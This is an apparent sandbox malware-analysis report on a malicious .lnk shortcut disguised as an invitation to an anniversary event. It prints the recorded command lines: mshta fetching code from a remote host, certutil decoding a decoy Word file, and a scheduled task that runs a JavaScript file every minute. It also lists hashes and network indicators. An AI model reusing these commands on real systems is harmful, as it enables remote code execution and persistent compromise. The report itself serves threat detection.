File name:

Приглашение[Касат. 80-летия Августовской революции 1945 г. и Дня Независимости].lnk

Full analysis: https://app.any.run/tasks/e9b5ac72-a9d5-4e1d-8207-6d1e296ae641
Verdict: Malicious activity
Analysis date: September 01, 2025, 10:57:37
OS: Windows 10 Professional (build: 19044, 64 bit)
Indicators:
MIME: application/x-ms-shortcut
File info: MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Unicoded, EnableTargetMetadata KnownFolderID 1AC14E77-02E7-4E5D-B744-2EB1AE5198B7, Archive, ctime=Mon Jul 13 23:42:23 2009, atime=Thu Aug 21 09:16:25 2025, mtime=Tue Jul 14 01:14:25 2009, length=0, window=showminnoactive, IDListSize 0x013b, Root folder "20D04FE0-3AEA-1069-A2D8-08002B30309D", Volume "C:\", LocalBasePath "C:\Windows\System32\mshta.exe"
MD5:

6D18166DA354EFACD541BCAC622A6E43

SHA1:

1147B53B0882A1733BD7E4F94148463163549983

SHA256:

028289FAC74184AB05C8E57E61E60F97E1345F20A5D523B995B29EB7BFC23C92

SSDEEP:

24:8FfOZsxitDTlHXSlKalzx8AUQd+/ZxFKqzEQ:8FfItDTtSbNdmQQ

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Uses Task Scheduler to run other applications

      • cmd.exe (PID: 2728)

    • Sends HTTP request (SCRIPT)

      • wscript.exe (PID: 3624)
      • wscript.exe (PID: 7052)

    • Creates internet connection object (SCRIPT)

      • wscript.exe (PID: 3624)
      • wscript.exe (PID: 7052)

    • Opens an HTTP connection (SCRIPT)

      • wscript.exe (PID: 3624)
      • wscript.exe (PID: 7052)

  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • mshta.exe (PID: 3788)

    • Decoding a file from Base64 using CertUtil

      • cmd.exe (PID: 5460)

    • Likely accesses (executes) a file from the Public directory

      • WINWORD.EXE (PID: 4196)

    • Suspicious WINWORD start

      • WINWORD.EXE (PID: 4196)

    • The process executes via Task Scheduler

      • wscript.exe (PID: 3624)
      • wscript.exe (PID: 7052)

    • Accesses computer name via WMI (SCRIPT)

      • wscript.exe (PID: 3624)
      • wscript.exe (PID: 7052)

  • INFO

    • Reads Internet Explorer settings

      • mshta.exe (PID: 3788)

    • Checks proxy server information

      • mshta.exe (PID: 3788)
      • wscript.exe (PID: 3624)
      • wscript.exe (PID: 7052)
      • slui.exe (PID: 6372)

    • Reads the software policy settings

      • slui.exe (PID: 6372)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.lnk | Windows Shortcut (100)

EXIF

LNK

Flags: IDList, LinkInfo, Description, RelativePath, WorkingDir, CommandArgs, IconFile, Unicode, TargetMetadata
FileAttributes: Archive
CreateDate: 2009:07:13 23:42:23+00:00
AccessDate: 2025:08:21 09:16:25+00:00
ModifyDate: 2009:07:14 01:14:25+00:00
TargetFileSize: -
IconIndex: (none)
RunWindow: Show Minimized No Activate
HotKey: (none)
DriveType: Fixed Disk
DriveSerialNumber: F423-8020
VolumeLabel: -
LocalBasePath: C:\Windows\System32\mshta.exe
Description: Type: Microsoft Word Document Size: 40 KB Date modified: 8/30/2025 3:17 PM
RelativePath: ..\..\..\Windows\System32\notepad.exe
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
152
Monitored processes
12
Malicious processes
2
Suspicious processes
1

Behavior graph

Click at the process to see the details
start mshta.exe cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs schtasks.exe no specs certutil.exe no specs winword.exe ai.exe no specs wscript.exe slui.exe wscript.exe

Process information

PID
CMD
Path
Indicators
Parent process
2040certutil -decode -f L298306.tmp "E-CARD.docx" C:\Windows\System32\certutil.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
CertUtil.exe
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\certutil.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\crypt32.dll
2728"C:\Windows\System32\cmd.exe" /c schtasks /create /sc minute /mo 1 /tn "Windows Themes Manager" /tr "wscript.exe \"C:\Users\admin\AppData\Roaming\Microsoft\Windows\Themes\Themes.js\"" /fC:\Windows\System32\cmd.exemshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\bcrypt.dll
3624"wscript.exe" "C:\Users\admin\AppData\Roaming\Microsoft\Windows\Themes\Themes.js"C:\Windows\System32\wscript.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.812.10240.16384
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
3788"C:\Windows\System32\mshta.exe" http://iuh234.medianewsonline.comC:\Windows\System32\mshta.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
11.00.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\mshta.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\wldp.dll
4196"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Public\E-CARD.docx" /o ""C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
16.0.16026.20146
Modules
Images
c:\program files\microsoft office\root\office16\winword.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\program files\common files\microsoft shared\clicktorun\appvisvsubsystems64.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\program files\common files\microsoft shared\clicktorun\c2r64.dll
c:\windows\system32\sechost.dll
5236"C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\ai.exe" "8DC0C6D4-7C6B-4E5E-84A5-F6DD95C10301" "140CDB26-7664-45C2-B364-C3E00499E752" "4196"C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\ai.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Artificial Intelligence (AI) Host for the Microsoft® Windows® Operating System and Platform x64.
Version:
0.12.2.0
Modules
Images
c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\office16\ai.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\common files\microsoft shared\clicktorun\appvisvsubsystems64.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
5460"C:\Windows\System32\cmd.exe" /c cd /d C:\Users\Public && certutil -decode -f L298306.tmp "E-CARD.docx" && del /f /q *.tmp && "E-CARD.docx"C:\Windows\System32\cmd.exemshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\bcrypt.dll
6160schtasks /create /sc minute /mo 1 /tn "Windows Themes Manager" /tr "wscript.exe \"C:\Users\admin\AppData\Roaming\Microsoft\Windows\Themes\Themes.js\"" /fC:\Windows\System32\schtasks.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Task Scheduler Configuration Tool
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
6372C:\WINDOWS\System32\slui.exe -EmbeddingC:\Windows\System32\slui.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
6832\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
18 096
Read events
17 710
Write events
363
Delete events
23

Modification events

(PID) Process:(5460) cmd.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.docx\OpenWithProgids
Operation:writeName:Word.Document.12
Value:
(PID) Process:(5460) cmd.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
Operation:writeName:{5985FC23-2588-4D9A-B38B-7E7AFFAB3155} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF
Value:
0100000000000000BF11833D2F1BDC01
(PID) Process:(4196) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\CrashPersistence\WINWORD\4196
Operation:writeName:0
Value:
0B0E10C8426F80F4ED5541AB7519F0D1601D1823004689A19EF1F3E586EE016A04102400449A7D64B29D01008500A907556E6B6E6F776EC906022222CA0DC2190000C91003783634C511E420D2120B770069006E0077006F00720064002E00650078006500C51620C517808004C91808323231322D44656300
(PID) Process:(4196) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:en-US
Value:
2
(PID) Process:(4196) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:de-de
Value:
2
(PID) Process:(4196) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:fr-fr
Value:
2
(PID) Process:(4196) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:es-es
Value:
2
(PID) Process:(4196) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:it-it
Value:
2
(PID) Process:(4196) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:ja-jp
Value:
2
(PID) Process:(4196) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:ko-kr
Value:
2
Executable files
34
Suspicious files
128
Text files
19
Unknown types
0

Dropped files

PID
Process
Filename
Type
4196WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\TokenBroker\Cache\5475cb191e478c39370a215b2da98a37e9dc813d.tbresbinary
MD5:D33FE7C53CF8F6A57E6BC354F9077AB3
SHA256:7A2F9CA7DA4F70D8583D8AA9AEBC2A8FA5A4271C971E07301AF3F6D5062FDBC9
3788mshta.exeC:\Users\Public\L298306.tmptext
MD5:18D872436627D9551BEA5CFD43C6B3C2
SHA256:8D81BD3624AC1E5446D92DB5CB6CFDB6C04B47650246E9A377D824E2BFD8892F
4196WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\E-CARD.docx.LNKbinary
MD5:BBC95D09C5741C9994951BAE045D5B04
SHA256:AB690FDCE0E1A47E874994BD58F696926A1928F01027160345690671994D1771
4196WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmbinary
MD5:1397418AA7892D3A4CA2FFDA38561850
SHA256:2B8F3784810EB64DF773E32660E719FBBB24BF724210A6078D22ED8F7BC008DB
4196WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\CCB1AF0B-5D13-4307-83CC-251D4F6F58D7xml
MD5:CA50D915ECC6A40D4F64338D0D7DDC80
SHA256:456D79CA0341D5EEF1B6F2FC10DE43F41D14383981D33E1143C6FB26FD521A1D
2040certutil.exeC:\Users\Public\E-CARD.docxdocument
MD5:E44EFEE3EBC96BB5187711A7C9177D37
SHA256:F32E2BB18F6DD2738408FF51B4FA8CCBF8DD7B5CCF1EEFEC24221EAF2278D4B0
4196WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Office\16.0\AddInClassifierCache\OfficeSharedEntities.bintext
MD5:CC90D669144261B198DEAD45AA266572
SHA256:89C701EEFF939A44F28921FD85365ECD87041935DCD0FE0BAF04957DA12C9899
4196WINWORD.EXEC:\Users\Public\~$E-CARD.docxbinary
MD5:CA84C8A0548736BC19EFB8049B4484B6
SHA256:F9B0634EF16F9590DCE3A7B7257C608A30A200E9A5B353ED156CEB6F24F86960
4196WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Office\16.0\AddInClassifierCache\OfficeSharedEntitiesUpdated.bintext
MD5:1E61B420AB98F10E7AA57DBED4B44961
SHA256:C1DD3A5755E347F439EC120070C3685B8903083D6E7B26DA35F305AF89069D99
4196WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dattext
MD5:632A6D7707C819F05528F2B2D923C7BB
SHA256:745F310B0521B691AC6297E68D7ACDCB0FFCBED7EBD84348CD4EF5DEE6628082
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
17
TCP/UDP connections
69
DNS requests
32
Threats
5

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3460
svchost.exe
GET
200
184.30.131.245:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
US
binary
471 b
whitelisted
4196
WINWORD.EXE
GET
200
184.30.131.245:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEA77flR%2B3w%2FxBpruV2lte6A%3D
US
binary
471 b
whitelisted
1268
svchost.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
NL
binary
814 b
whitelisted
1268
svchost.exe
GET
200
2.16.164.73:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
NL
binary
825 b
whitelisted
4196
WINWORD.EXE
GET
200
2.16.164.73:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
NL
binary
825 b
whitelisted
4196
WINWORD.EXE
GET
200
2.16.164.73:80
http://crl.microsoft.com/pki/crl/products/MicCodSigPCA_08-31-2010.crl
NL
binary
564 b
whitelisted
4196
WINWORD.EXE
GET
200
2.16.164.73:80
http://crl.microsoft.com/pki/crl/products/MicrosoftTimeStampPCA.crl
NL
binary
519 b
whitelisted
3788
mshta.exe
GET
200
185.176.43.108:80
http://iuh234.medianewsonline.com/
BG
html
16.9 Kb
unknown
4196
WINWORD.EXE
GET
200
2.16.164.73:80
http://crl.microsoft.com/pki/crl/products/microsoftrootcert.crl
NL
binary
767 b
whitelisted
4196
WINWORD.EXE
GET
200
2.16.164.73:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut_2010-06-23.crl
NL
binary
824 b
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
1268
svchost.exe
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
5944
MoUsoCoreWorker.exe
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
4024
RUXIMICS.exe
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
3788
mshta.exe
185.176.43.108:80
iuh234.medianewsonline.com
Zetta Hosting Solutions LLC.
BG
unknown
4
System
192.168.100.255:138
whitelisted
4196
WINWORD.EXE
52.109.28.46:443
officeclient.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
GB
whitelisted
4196
WINWORD.EXE
52.123.129.14:443
ecs.office.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
4196
WINWORD.EXE
23.50.131.71:443
omex.cdn.office.net
Akamai International B.V.
DE
whitelisted
4196
WINWORD.EXE
23.212.222.21:443
fs.microsoft.com
AKAMAI-AS
AU
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 51.124.78.146
  • 40.127.240.158
whitelisted
google.com
  • 172.217.16.142
whitelisted
iuh234.medianewsonline.com
  • 185.176.43.108
unknown
officeclient.microsoft.com
  • 52.109.28.46
whitelisted
ecs.office.com
  • 52.123.129.14
  • 52.123.128.14
whitelisted
omex.cdn.office.net
  • 23.50.131.71
  • 23.50.131.87
whitelisted
fs.microsoft.com
  • 23.212.222.21
whitelisted
messaging.engagement.office.com
  • 52.111.236.4
whitelisted
messaging.lifecycle.office.com
  • 52.109.16.3
whitelisted
nleditor.osi.office.net
  • 172.187.61.156
whitelisted

Threats

PID
Process
Class
Message
3788
mshta.exe
Misc activity
ET INFO Observed UA-CPU Header
3788
mshta.exe
Potentially Bad Traffic
SUSPICIOUS [ANY.RUN] VBS is used to run Shell
3788
mshta.exe
Potentially Bad Traffic
ET WEB_CLIENT Hex Obfuscation of eval % Encoding
3624
wscript.exe
Potentially Bad Traffic
ET WEB_CLIENT Hex Obfuscation of eval % Encoding
7052
wscript.exe
Potentially Bad Traffic
ET WEB_CLIENT Hex Obfuscation of eval % Encoding
Process
Message
WINWORD.EXE
WebView2: Failed to find an installed WebView2 runtime or non-stable Microsoft Edge installation.
WINWORD.EXE
WebView2: Failed to find an installed WebView2 runtime or non-stable Microsoft Edge installation.
WINWORD.EXE
WebView2: Failed to find an installed WebView2 runtime or non-stable Microsoft Edge installation.
Interactive malware hunting service ANY.RUN
© 2017-2026 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
Приглашение[Касат. 80-летия Августовской революции 1945 г. и Дня Независимости].lnk